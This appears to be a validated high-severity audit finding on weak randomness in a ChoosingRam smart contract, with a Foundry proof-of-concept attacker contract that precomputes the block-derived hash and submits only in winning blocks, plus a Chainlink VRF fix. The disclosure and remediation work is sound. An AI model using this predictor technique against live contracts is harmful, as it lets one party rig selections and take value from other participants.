Submission Details
Severity: high
Valid

Weak randomization in `ChoosingRam::increaseValuesOfParticipants` and `ChoosingRam::selectRamIfNotSelected`

Summary

Any NFT holder can make themselves `selectedRam` by precomputing the pseudo-random value used in `ChoosingRam::increaseValuesOfParticipants` and only submitting the transaction in a block where the result favours them. The Organiser can do the same through `ChoosingRam::selectRamIfNotSelected`.

Vulnerability Details

Deriving random numbers from block data is not secure, because an attacking contract or user can compute the value before the transaction is sent and act on it. Here the "random" value is a hash of `block.timestamp`, `block.prevrandao`, and `msg.sender`. All three inputs are known before the call is made: the caller chooses `msg.sender` (any address, including a contract), `block.prevrandao` is fixed once the previous block is published, and `block.timestamp` can be read by simulating the call in the current block, so the attacker can simply skip blocks in which the outcome is unfavourable.

Furthermore, on Arbitrum `block.prevrandao` is the constant 1, so the only input that varies between blocks is the timestamp, and the randomness is diminished further.

With this, a malicious user can compute the outcome in advance and know whether the call will make them `selectedRam` before paying for it.

The Organiser can likewise compute the outcome before calling `ChoosingRam::selectRamIfNotSelected` and choose when (and whether) to call it, which is a serious centralization issue.
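
The pattern above, as an added example that is not the project's code: `WeakRandomSelector` is a hypothetical stand-in that keeps only the hash inputs named in this finding (the real `ChoosingRam` logic and its function signatures are not reproduced), `Predictor` is the attacker contract, and the Foundry test walks the timestamp forward until the precomputation says the attacker wins. Contract and function names here are assumptions for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Hypothetical stand-in for the weak randomness described in the finding.
// Only the hash inputs (block.timestamp, block.prevrandao, msg.sender) come
// from the finding; everything else is simplified for illustration.
contract WeakRandomSelector {
    address public selectedRam;

    // The exact value the selection below will use in the current block.
    function randomFor(address caller) public view returns (uint256) {
        return uint256(keccak256(abi.encodePacked(block.timestamp, block.prevrandao, caller)));
    }

    // Caller becomes selectedRam on an even draw: a 1-in-2 chance only if the
    // draw were genuinely unpredictable.
    function tryBecomeRam() external {
        if (randomFor(msg.sender) % 2 == 0) {
            selectedRam = msg.sender;
        }
    }
}

// Attacker contract. Inside the target, msg.sender is this contract's
// address, so every hash input is known before the transaction is sent.
contract Predictor {
    WeakRandomSelector public immutable target;

    constructor(WeakRandomSelector _target) {
        target = _target;
    }

    // Same formula as the target, evaluated with address(this) as msg.sender.
    function willWin() public view returns (bool) {
        uint256 draw = uint256(keccak256(abi.encodePacked(block.timestamp, block.prevrandao, address(this))));
        return draw % 2 == 0;
    }

    // Only spend the transaction when the outcome is favourable. In practice the
    // attacker simulates this with eth_call each block; the revert is the safety
    // net if the block lands with a timestamp other than the simulated one.
    function attack() external {
        require(willWin(), "unfavourable block, try again");
        target.tryBecomeRam();
    }
}

contract PredictorTest is Test {
    function test_attackerWinsByChoosingTheBlock() public {
        WeakRandomSelector sel = new WeakRandomSelector();
        Predictor p = new Predictor(sel);

        // Arbitrum: block.prevrandao is the constant 1, so only the timestamp varies.
        vm.prevrandao(bytes32(uint256(1)));

        // Advance one second per "block" until the precomputation says win.
        while (!p.willWin()) {
            vm.warp(block.timestamp + 1);
        }

        p.attack();
        assertEq(sel.selectedRam(), address(p));
    }
}
```

Run with `forge test --match-contract PredictorTest`. The same loop is what an attacker runs off-chain against the real contract: read the inputs, hash them, and submit only when the result is the desired one. Note that `msg.sender` adds no entropy, since the attacker picks it by deploying as many helper contracts as needed.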

Impact

A user can unfairly get themselves picked as `selectedRam`, or the Organiser can effectively pick the winner.

Tools Used

Manual review

Recommendations

Use a verifiable source of randomness so that `selectedRam` is genuinely chosen at random, and perform the selection in the randomness provider's callback rather than in a transaction whose timing a user or the Organiser controls.

Chainlink VRF is a suitable option (refer to the official documentation for the initialization of the VRF consumer base contract for the version you deploy).
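
The recommendation above as an added example, not the project's code: a hypothetical `VrfRamSelector` that requests one random word and picks the winner inside `fulfillRandomWords`, so neither a participant nor the Organiser can choose the block in which the draw happens. The import paths and the `VRFConsumerBaseV2Plus` / `VRFV2PlusClient` API follow the Chainlink VRF v2.5 documentation as of this writing; the key hash, subscription ID, gas limit and the `participants` bookkeeping are assumptions, so check them against the current docs before use.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {VRFConsumerBaseV2Plus} from "@chainlink/contracts/src/v0.8/vrf/dev/VRFConsumerBaseV2Plus.sol";
import {VRFV2PlusClient} from "@chainlink/contracts/src/v0.8/vrf/dev/libraries/VRFV2PlusClient.sol";

// Hypothetical selector: enrol participants, then let the VRF callback pick one.
contract VrfRamSelector is VRFConsumerBaseV2Plus {
    address[] public participants;
    address public selectedRam;
    uint256 public pendingRequestId;

    bytes32 private immutable keyHash;          // gas lane for the target chain
    uint256 private immutable subId;            // funded VRF subscription

    constructor(address coordinator, bytes32 _keyHash, uint256 _subId)
        VRFConsumerBaseV2Plus(coordinator)
    {
        keyHash = _keyHash;
        subId = _subId;
    }

    // Enrolment is closed once a request is in flight or a winner exists, so the
    // participant set cannot be changed after the random word is committed to.
    function join() external {
        require(pendingRequestId == 0 && selectedRam == address(0), "selection started");
        participants.push(msg.sender);
    }

    // Anyone (including the Organiser) may trigger the request, but triggering it
    // reveals nothing: the random word only arrives later, from the coordinator.
    function requestSelection() external {
        require(pendingRequestId == 0 && selectedRam == address(0), "already requested");
        require(participants.length > 0, "no participants");
        pendingRequestId = s_vrfCoordinator.requestRandomWords(
            VRFV2PlusClient.RandomWordsRequest({
                keyHash: keyHash,
                subId: subId,
                requestConfirmations: 3,
                callbackGasLimit: 100_000,
                numWords: 1,
                extraArgs: VRFV2PlusClient._argsToBytes(
                    VRFV2PlusClient.ExtraArgsV1({nativePayment: false})
                )
            })
        );
    }

    // Called by the coordinator only; this is where the winner is decided.
    function fulfillRandomWords(uint256 requestId, uint256[] calldata randomWords) internal override {
        require(requestId == pendingRequestId, "unknown request");
        selectedRam = participants[randomWords[0] % participants.length];
        pendingRequestId = 0;
    }
}
```

The two guards matter as much as the randomness source: closing enrolment when the request is made stops anyone from adjusting the participant list after the outcome is fixed, and doing the selection inside the callback means no user-controlled transaction can be timed or reverted to influence it.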

Updates

Lead Judging Commences

bube (Lead Judge), over 1 year ago

Submission Judgement Published

bube (Lead Judge), about 1 year ago

Validated. Assigned finding tags:

Weak randomness in `ChoosingRam::increaseValuesOfParticipants`
